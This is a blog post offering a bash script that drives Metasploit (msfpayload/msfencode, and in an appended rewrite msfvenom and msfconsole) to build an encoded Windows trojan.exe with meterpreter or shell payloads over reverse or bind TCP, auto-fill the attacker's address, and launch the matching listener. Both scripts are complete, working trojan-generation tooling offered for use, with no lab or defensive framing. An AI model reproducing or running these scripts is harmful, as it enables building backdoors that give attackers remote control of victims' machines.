Monday, August 28, 2017

Script to simple using msfpayload msfencode to create metasploit payload trojans

The following is a script I wrote to simplify using msfpayload and msfencode to build a Windows-based trojan and stand up the matching listener. Let's face it: scripting is faster and easier, and it keeps the process uniform and repeatable.

The script will do the following:
  • Determine your IP address automatically for the LHOST of the payload.
  • Ask whether you want a shell or meterpreter.
  • Ask whether you want a reverse connection or a bind TCP port.
  • Request the port number.
  • Create two files:
      trojan.exe - your payload executable
      msf_Trojan_Listener - a file holding the one-liner that starts the Metasploit listener matching your payload.
  • Start msfcli to run that listener.

Here are two screenshots of it in action:

[Screenshot 1: msf_trojan_generator]
[Screenshot 2: msf_trojan_generator]

And of course, you'll probably want the code, so here it is. ;-)
==================================================================
#!/bin/bash
# Number of encoding passes handed to msfencode (-c).
ENCODINGTIMES=5
# First non-loopback IPv4 address, used as LHOST for reverse payloads.
# The grep and awk patterns must be quoted, otherwise grep looks for a file named "addr".
IP=$(ifconfig | grep "inet addr" | grep -v 127.0.0.1 | cut -d: -f2 | awk '{print $1}' | head -n 1)
echo " #######################################"
echo " #       MSF Trojan Generator v1.0     #"
echo " #######################################"
echo " Coded By: Travis Phillips"
echo " Website: http://theunl33t.blogspot.com"
echo " Your IP = $IP"
echo -n " What type of trojan? 1) meterpreter 2) shell  Which is it: "
read METERORSHELL
echo -n " What kind of trojan? 1) Reverse Connection 2) bind_TCP  Which is it: "
read LISTENORREVERSE
echo -n " What port number are we going to use: "
read PORTNUM

# Reverse: the payload needs our LHOST. Bind: the payload only needs LPORT,
# and the handler needs the victim's address in RHOST instead.
# Variables are quoted so an empty answer does not break the test.
if [ "$LISTENORREVERSE" = "1" ]; then
 LORR=reverse_tcp
 LHOST=LHOST=
else
 LORR=bind_tcp
 LHOST=
 IP=
 echo -n " Since you want a bind port, what is the IP of the remote host: "
 read REMOTEHOST
 RH=RHOST=
fi

if [ "$METERORSHELL" = "1" ]; then
 SHELLTYPE=meterpreter
else
 SHELLTYPE=shell
fi

echo " [*] Generating trojan with the following: windows/$SHELLTYPE/$LORR $LHOST$IP$RH$REMOTEHOST LPORT=$PORTNUM"
echo " This can take some time. Please wait... "

# R = raw payload on stdout, piped into msfencode, which encodes it and wraps it in an exe template.
msfpayload windows/$SHELLTYPE/$LORR $LHOST$IP LPORT=$PORTNUM R | msfencode -t exe -o ./trojan.exe -c $ENCODINGTIMES
echo " [*] Done generating $(pwd)/trojan.exe! "
ls -l trojan.exe

# The handler one-liner is printed, saved for later, then executed (E = execute).
LISTENER="msfcli multi/handler PAYLOAD=windows/$SHELLTYPE/$LORR $LHOST$IP$RH$REMOTEHOST LPORT=$PORTNUM E"
echo " [*] Now running listener: $LISTENER"
echo "     NOTE: also saving this to $(pwd)/msf_Trojan_Listener for a simple cat/paste later."
echo "$LISTENER" > msf_Trojan_Listener
$LISTENER

==================================================================
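The same generator rebuilt on the current tooling, as an added example (this is not the post's script and not Metasploit code): msfpayload, msfencode and msfcli were removed from the Metasploit Framework in 2015, and their jobs now fall to msfvenom (generation plus encoding in one step) and an msfconsole resource file for the handler. Command construction lives in small functions so the logic can be exercised without Metasploit installed, and both the port and the address are validated before they reach a command line. The encoder, iteration count, output names and the `hostname -I` fallback for address detection are assumed defaults.

```shell
#!/usr/bin/env bash
# Added example, not the original post's script: msfvenom + msfconsole
# resource file in place of msfpayload/msfencode/msfcli. Assumed defaults:
# x86/shikata_ga_nai, 5 iterations, trojan.exe and handler.rc in the cwd.

ENCODER="x86/shikata_ga_nai"
ITERATIONS=5
OUTFILE="trojan.exe"
RCFILE="handler.rc"
VENOM_FLAGS="-a x86 --platform windows -e $ENCODER -i $ITERATIONS -f exe -o $OUTFILE"

# First non-loopback IPv4 address, via ip(8) with a hostname(1) fallback.
detect_lhost() {
    addr=$(ip -4 -o addr show 2>/dev/null |
           awk '$4 !~ /^127\./ { sub(/\/.*/, "", $4); print $4; exit }')
    [ -n "$addr" ] || addr=$(hostname -I 2>/dev/null | awk '{ print $1 }')
    printf '%s\n' "$addr"
}

# Integer in 1..65535; anything else is rejected before it reaches a command line.
valid_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Host names and IPv4 literals only: no spaces or shell metacharacters.
valid_addr() {
    case "$1" in ''|*[!A-Za-z0-9.-]*) return 1 ;; esac
    return 0
}

# Map the two menu choices to a Metasploit payload path.
# $1: meterpreter|shell   $2: reverse|bind
payload_name() {
    case "$2" in
        reverse) printf 'windows/%s/reverse_tcp\n' "$1" ;;
        bind)    printf 'windows/%s/bind_tcp\n' "$1" ;;
        *)       return 1 ;;
    esac
}

# Payload options: a reverse payload must carry our LHOST; a bind payload only
# listens on LPORT and embeds nothing about us.   $1: payload $2: addr $3: port
payload_opts() {
    case "$1" in
        */reverse_tcp) printf 'LHOST=%s LPORT=%s\n' "$2" "$3" ;;
        *)             printf 'LPORT=%s\n' "$3" ;;
    esac
}

# Full msfvenom command line, for display and for the operator's notes.
venom_cmd() {
    printf 'msfvenom -p %s %s %s\n' "$1" "$(payload_opts "$1" "$2" "$3")" "$VENOM_FLAGS"
}

# Resource script for multi/handler. A bind payload needs the target in RHOST,
# a reverse payload needs our LHOST; ExitOnSession false keeps the handler up.
# $1: payload  $2: addr  $3: port  $4: output path
write_handler_rc() {
    case "$1" in
        */reverse_tcp) addr_line="set LHOST $2" ;;
        */bind_tcp)    addr_line="set RHOST $2" ;;
        *)             return 1 ;;
    esac
    {
        echo "use exploit/multi/handler"
        echo "set PAYLOAD $1"
        echo "$addr_line"
        echo "set LPORT $3"
        echo "set ExitOnSession false"
        echo "exploit -j -z"
    } > "$4"
}

# Interactive front end, run only with "run" as the first argument so the
# functions above can be sourced or tested without Metasploit present.
main() {
    printf 'Trojan type   1) meterpreter  2) shell : '; read -r t
    printf 'Connection    1) reverse_tcp  2) bind_tcp : '; read -r c
    printf 'Port number : '; read -r port
    [ "$t" = "1" ] && kind=meterpreter || kind=shell
    if [ "$c" = "1" ]; then
        conn=reverse; addr=$(detect_lhost)
    else
        conn=bind; printf 'Target IP for the bind handler : '; read -r addr
    fi
    valid_port "$port" || { echo "invalid port: $port" >&2; exit 1; }
    valid_addr "$addr" || { echo "invalid address: $addr" >&2; exit 1; }
    payload=$(payload_name "$kind" "$conn")
    echo "[*] $(venom_cmd "$payload" "$addr" "$port")"
    # Word splitting of the options is intended; both values were validated above.
    msfvenom -p "$payload" $(payload_opts "$payload" "$addr" "$port") $VENOM_FLAGS || exit 1
    write_handler_rc "$payload" "$addr" "$port" "$RCFILE"
    echo "[*] Wrote $OUTFILE and $RCFILE; starting handler"
    msfconsole -q -r "$RCFILE"
}

if [ "${1:-}" = "run" ]; then main; fi
```

Run it as `./msf_trojan_generator.sh run`; the saved resource file can be reused later with `msfconsole -q -r handler.rc`, which replaces the cat/paste of the msfcli one-liner. Bind payloads deliberately carry no LHOST, so the only address the handler needs is the target's RHOST. One caveat on the encoding passes (`-i` here, `-c` in the original): they are not an anti-virus measure. shikata_ga_nai output has been signatured for years, and stacking iterations mainly inflates the binary.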

